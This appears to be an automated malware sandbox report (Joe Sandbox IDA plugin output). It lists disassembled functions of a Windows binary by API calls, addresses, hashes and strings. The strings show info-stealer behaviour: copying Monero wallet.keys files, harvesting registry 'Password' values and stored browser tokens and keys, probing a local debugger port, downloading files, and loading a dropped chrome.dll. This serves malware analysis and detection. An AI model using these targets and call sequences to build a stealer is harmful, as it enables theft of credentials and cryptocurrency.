                                  • Instruction ID: 03f1fa89c73df4594f72cba29ce2b380ca9e69013da1533ef766f4da94d8ba3a
                                  • Opcode Fuzzy Hash: 6b537c5227b297e5fca4045d0974d1f889ee5964d7efd236da2cda6f25e22505
                                  • Instruction Fuzzy Hash: 01C173B5D00219ABCF14EF60DC99FEE77B9AF54304F0049D8E509A7251DAB0AA85CF91
                                  APIs
                                    • Part of subcall function 00BB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB453C
                                  • lstrcat.KERNEL32(?,0130E840), ref: 00BB455B
                                  • lstrcat.KERNEL32(?,?), ref: 00BB456F
                                  • lstrcat.KERNEL32(?,0130DA58), ref: 00BB4583
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BB8F20: GetFileAttributesA.KERNEL32(00000000,?,00BA1B94,?,?,00BC577C,?,?,00BC0E22), ref: 00BB8F2F
                                    • Part of subcall function 00BAA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BAA489
                                    • Part of subcall function 00BAA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BAA13C
                                    • Part of subcall function 00BAA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BAA161
                                    • Part of subcall function 00BAA110: LocalAlloc.KERNEL32(00000040,?), ref: 00BAA181
                                    • Part of subcall function 00BAA110: ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BAA1AA
                                    • Part of subcall function 00BAA110: LocalFree.KERNEL32(00BA148F), ref: 00BAA1E0
                                    • Part of subcall function 00BAA110: CloseHandle.KERNEL32(000000FF), ref: 00BAA1EA
                                    • Part of subcall function 00BB9550: GlobalAlloc.KERNEL32(00000000,00BB462D,00BB462D), ref: 00BB9563
                                  • StrStrA.SHLWAPI(?,0130E660), ref: 00BB4643
                                  • GlobalFree.KERNEL32(?), ref: 00BB4762
                                    • Part of subcall function 00BAA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4F3E,00000000,00000000), ref: 00BAA23F
                                    • Part of subcall function 00BAA210: LocalAlloc.KERNEL32(00000040,?,?,?,00BA4F3E,00000000,?), ref: 00BAA251
                                    • Part of subcall function 00BAA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4F3E,00000000,00000000), ref: 00BAA27A
                                    • Part of subcall function 00BAA210: LocalFree.KERNEL32(?,?,?,?,00BA4F3E,00000000,?), ref: 00BAA28F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB46F3
                                  • StrCmpCA.SHLWAPI(?,00BC08D2), ref: 00BB4710
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00BB4722
                                  • lstrcat.KERNEL32(00000000,?), ref: 00BB4735
                                  • lstrcat.KERNEL32(00000000,00BC0FA0), ref: 00BB4744
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: e9148c4c0952fc205a57828c2c446c99aa5511fdb144f2c5512261a2030c4630
                                  • Instruction ID: a74e083c9eddc840ffcb4fdf8febffa92b349a84cafba50426d00dfb9e74e9c7
                                  • Opcode Fuzzy Hash: e9148c4c0952fc205a57828c2c446c99aa5511fdb144f2c5512261a2030c4630
                                  • Instruction Fuzzy Hash: F77165B6900208ABDF14EBA0DD95FEE77BDAB88300F0045D8B619A6151EB75DB48CB61
                                  APIs
                                    • Part of subcall function 00BA12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BA12B4
                                    • Part of subcall function 00BA12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00BA12BB
                                    • Part of subcall function 00BA12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BA12D7
                                    • Part of subcall function 00BA12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BA12F5
                                    • Part of subcall function 00BA12A0: RegCloseKey.ADVAPI32(?), ref: 00BA12FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BA134F
                                  • lstrlen.KERNEL32(?), ref: 00BA135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 00BA1377
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BB8CF0: GetSystemTime.KERNEL32(00BC0E1B,0130AA18,00BC05B6,?,?,00BA13F9,?,0000001A,00BC0E1B,00000000,?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BB8D16
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00BA1465
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                    • Part of subcall function 00BAA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BAA13C
                                    • Part of subcall function 00BAA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BAA161
                                    • Part of subcall function 00BAA110: LocalAlloc.KERNEL32(00000040,?), ref: 00BAA181
                                    • Part of subcall function 00BAA110: ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BAA1AA
                                    • Part of subcall function 00BAA110: LocalFree.KERNEL32(00BA148F), ref: 00BAA1E0
                                    • Part of subcall function 00BAA110: CloseHandle.KERNEL32(000000FF), ref: 00BAA1EA
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BA14EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: a5b9750836e0bbebc375724883bdb234b8054bd2ebe9dd622fb9d2edbac18c83
                                  • Instruction ID: 08a79673a46b4928b28496ba7aef5bd7d0092ba78d9a2dda347d13e884df763c
                                  • Opcode Fuzzy Hash: a5b9750836e0bbebc375724883bdb234b8054bd2ebe9dd622fb9d2edbac18c83
                                  • Instruction Fuzzy Hash: A35143B1D501186BCB65FB60DD92FFD73BC9B54300F4045E8B60A62092EE706B89CFA5
                                  APIs
                                  • InternetOpenA.WININET(00BC0AF6,00000001,00000000,00000000,00000000), ref: 00BA9A6A
                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00BA9AAB
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA9AC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$Open$CloseHandle
                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                  • API String ID: 3289985339-2144369209
                                  • Opcode ID: 549ffadcf36e62e8bacb8a32497753dfd496d2b9c37b522732d5079c43317e1f
                                  • Instruction ID: be6b30fefedbc89fbb5dbe177e6a39c30d12adab87bc9e45d8755b3a53c5dfaf
                                  • Opcode Fuzzy Hash: 549ffadcf36e62e8bacb8a32497753dfd496d2b9c37b522732d5079c43317e1f
                                  • Instruction Fuzzy Hash: 8D41F775A14218AFDB14EBA4CC95FEE77B8EB48740F1040D9F549AA190DBB0AE84CB60
                                  APIs
                                    • Part of subcall function 00BA7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BA739A
                                    • Part of subcall function 00BA7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BA7411
                                    • Part of subcall function 00BA7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BA746D
                                    • Part of subcall function 00BA7330: GetProcessHeap.KERNEL32(00000000,?), ref: 00BA74B2
                                    • Part of subcall function 00BA7330: HeapFree.KERNEL32(00000000), ref: 00BA74B9
                                  • lstrcat.KERNEL32(00000000,00BC192C), ref: 00BA7666
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00BA76A8
                                  • lstrcat.KERNEL32(00000000, : ), ref: 00BA76BA
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00BA76EF
                                  • lstrcat.KERNEL32(00000000,00BC1934), ref: 00BA7700
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00BA7733
                                  • lstrcat.KERNEL32(00000000,00BC1938), ref: 00BA774D
                                  • task.LIBCPMTD ref: 00BA775B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                  • String ID: :
                                  • API String ID: 2677904052-3653984579
                                  • Opcode ID: 7c7df4b170306f08dc7a51183d3c80ca9b9cf4bd87b0790edc0050cc2748c55d
                                  • Instruction ID: f807971939b1c8db969e9097ee986f30913ee23c8fb9a0175208510020471aee
                                  • Opcode Fuzzy Hash: 7c7df4b170306f08dc7a51183d3c80ca9b9cf4bd87b0790edc0050cc2748c55d
                                  • Instruction Fuzzy Hash: 243161B1D0C104EFDB04EBA4DC96DFE77B9AB49301B504168F116B32A1DE34A98ACB90
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0130E468,00000000,?,00BC0E14,00000000,?,00000000), ref: 00BB82C0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB82C7
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00BB82E8
                                  • __aulldiv.LIBCMT ref: 00BB8302
                                  • __aulldiv.LIBCMT ref: 00BB8310
                                  • wsprintfA.USER32 ref: 00BB833C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2774356765-3474575989
                                  • Opcode ID: 17caed44d843369f8ec1b56477c2164516d396e11118f3f413884ec39d6a8976
                                  • Instruction ID: 90c395e8ec104393e64cfe9ffd0477597ef92af24e8fefe812e3037715421e68
                                  • Opcode Fuzzy Hash: 17caed44d843369f8ec1b56477c2164516d396e11118f3f413884ec39d6a8976
                                  • Instruction Fuzzy Hash: 012108B1E44208ABDB00DFD5CC49FBEB7B8FB44B14F104559F619BB280D7B869048BA5
                                  APIs
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                    • Part of subcall function 00BA4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BA4889
                                    • Part of subcall function 00BA4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BA4899
                                  • InternetOpenA.WININET(00BC0DFB,00000001,00000000,00000000,00000000), ref: 00BA615F
                                  • StrCmpCA.SHLWAPI(?,0130EE58), ref: 00BA6197
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00BA61DF
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00BA6203
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00BA622C
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00BA625A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00BA6299
                                  • InternetCloseHandle.WININET(?), ref: 00BA62A3
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA62B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: 00b9ecc71b690b4fbb51e6b88c9837432680fa20ba45c27be5a1180a2c917d24
                                  • Instruction ID: 4de67d1130c755481af3319853753771696a45b99f62c831710ebedf3e0c11fe
                                  • Opcode Fuzzy Hash: 00b9ecc71b690b4fbb51e6b88c9837432680fa20ba45c27be5a1180a2c917d24
                                  • Instruction Fuzzy Hash: D5514EB1A04218AFDF20DFA0CC45BEE77B8AB45301F4040D8E609B71C0DBB4AA89CF95
                                  APIs
                                  • type_info::operator==.LIBVCRUNTIME ref: 00C2024D
                                  • ___TypeMatch.LIBVCRUNTIME ref: 00C2035B
                                  • CatchIt.LIBVCRUNTIME ref: 00C203AC
                                  • CallUnexpected.LIBVCRUNTIME ref: 00C204C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                  • String ID: csm$csm$csm
                                  • API String ID: 2356445960-393685449
                                  • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                  • Instruction ID: 230816e2a2c2ea3a6d7eeb0557c29a34d7cc0d6b0eb7adece47379d1cf63103a
                                  • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                  • Instruction Fuzzy Hash: B6B19F71800229DFCF15EFA4E8819AEBBB5FF14310F24815BE9216BA13D730DA51DB91
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BA739A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BA7411
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BA746D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00BA74B2
                                  • HeapFree.KERNEL32(00000000), ref: 00BA74B9
                                  • task.LIBCPMTD ref: 00BA75B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuetask
                                  • String ID: Password
                                  • API String ID: 775622407-3434357891
                                  • Opcode ID: 0903113ef9a08b78b5529f558be00cda89c3d81d4217f6fa09ea723b33ff3ac1
                                  • Instruction ID: 5f4af7e8799aa47cf84ac217d44d6365b78bc5b7b97acc75183d4e5c9f4406b5
                                  • Opcode Fuzzy Hash: 0903113ef9a08b78b5529f558be00cda89c3d81d4217f6fa09ea723b33ff3ac1
                                  • Instruction Fuzzy Hash: FC61F8B5D482689BDB24DB50CC55BD9B7F8FB59300F0081E9E689A6141EFB06BC9CF90
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                  • lstrlen.KERNEL32(00000000), ref: 00BABC6F
                                    • Part of subcall function 00BB8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BB8FE2
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00BABC9D
                                  • lstrlen.KERNEL32(00000000), ref: 00BABD75
                                  • lstrlen.KERNEL32(00000000), ref: 00BABD89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: 4ad8f1275589a1a8e1ed2cc3db54a02ac67dd3c8634d87c62c8d7aa49944d883
                                  • Instruction ID: f47b0aef80231fb6592cd4ef1b77ff0262f0a95c103f8ca60bbf69e0a46d15b8
                                  • Opcode Fuzzy Hash: 4ad8f1275589a1a8e1ed2cc3db54a02ac67dd3c8634d87c62c8d7aa49944d883
                                  • Instruction Fuzzy Hash: 09B1FF71D10108ABCF14EBA0DDA6EFE77B9AF54300F4045E8F51676192EFB46A48CB62
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: c276a3a63de13fffb9ca216336902a2669b4ef9d4878b258489af8b7921406c4
                                  • Instruction ID: 7278611f4f0b15dd07090615a01a2d0836eb639f6d57bd798125ff6a52fe40ef
                                  • Opcode Fuzzy Hash: c276a3a63de13fffb9ca216336902a2669b4ef9d4878b258489af8b7921406c4
                                  • Instruction Fuzzy Hash: EBF03A3090A209EFD744EFE2A8097ACBB70EB04706F5141A5E65DB65A0CBB44A80DB51
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BB9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00BB08DC,C:\ProgramData\chrome.dll), ref: 00BB9871
                                    • Part of subcall function 00BAA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00BAA098
                                  • StrCmpCA.SHLWAPI(00000000,013096D8), ref: 00BB0922
                                  • StrCmpCA.SHLWAPI(00000000,01309658), ref: 00BB0B79
                                  • StrCmpCA.SHLWAPI(00000000,01309638), ref: 00BB0A0C
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                  • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00BB0C35
                                  Strings
                                  • C:\ProgramData\chrome.dll, xrefs: 00BB08CD
                                  • C:\ProgramData\chrome.dll, xrefs: 00BB0C30
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                  • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                  • API String ID: 585553867-663540502
                                  • Opcode ID: 808df9fb12b437995d4980124a41ba54c3b73c5d5d33bc706aee480f62dbc610
                                  • Instruction ID: 4f29952ce1498d42dcf31835ca110031e8f75c0163db123860ad5ed7f603b8c4
                                  • Opcode Fuzzy Hash: 808df9fb12b437995d4980124a41ba54c3b73c5d5d33bc706aee480f62dbc610
                                  • Instruction Fuzzy Hash: 31A11571B001089FCB28EF64D996EFD77F6EF95300F5085ADE40A5F291DA709A09CB92
                                  APIs
                                    • Part of subcall function 00BB8CF0: GetSystemTime.KERNEL32(00BC0E1B,0130AA18,00BC05B6,?,?,00BA13F9,?,0000001A,00BC0E1B,00000000,?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BB8D16
                                  • wsprintfA.USER32 ref: 00BA9E7F
                                  • lstrcat.KERNEL32(00000000,?), ref: 00BA9F03
                                  • lstrcat.KERNEL32(00000000,?), ref: 00BA9F17
                                  • lstrcat.KERNEL32(00000000,00BC12D8), ref: 00BA9F29
                                  • lstrcpy.KERNEL32(?,00000000), ref: 00BA9F7C
                                  • Sleep.KERNEL32(00001388), ref: 00BAA013
                                    • Part of subcall function 00BB99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BB99C5
                                    • Part of subcall function 00BB99A0: Process32First.KERNEL32(00BAA056,00000128), ref: 00BB99D9
                                    • Part of subcall function 00BB99A0: Process32Next.KERNEL32(00BAA056,00000128), ref: 00BB99F2
                                    • Part of subcall function 00BB99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BB9A4E
                                    • Part of subcall function 00BB99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00BB9A6C
                                    • Part of subcall function 00BB99A0: CloseHandle.KERNEL32(00000000), ref: 00BB9A79
                                    • Part of subcall function 00BB99A0: CloseHandle.KERNEL32(00BAA056), ref: 00BB9A88
                                  Strings
                                  Memory Dump Source
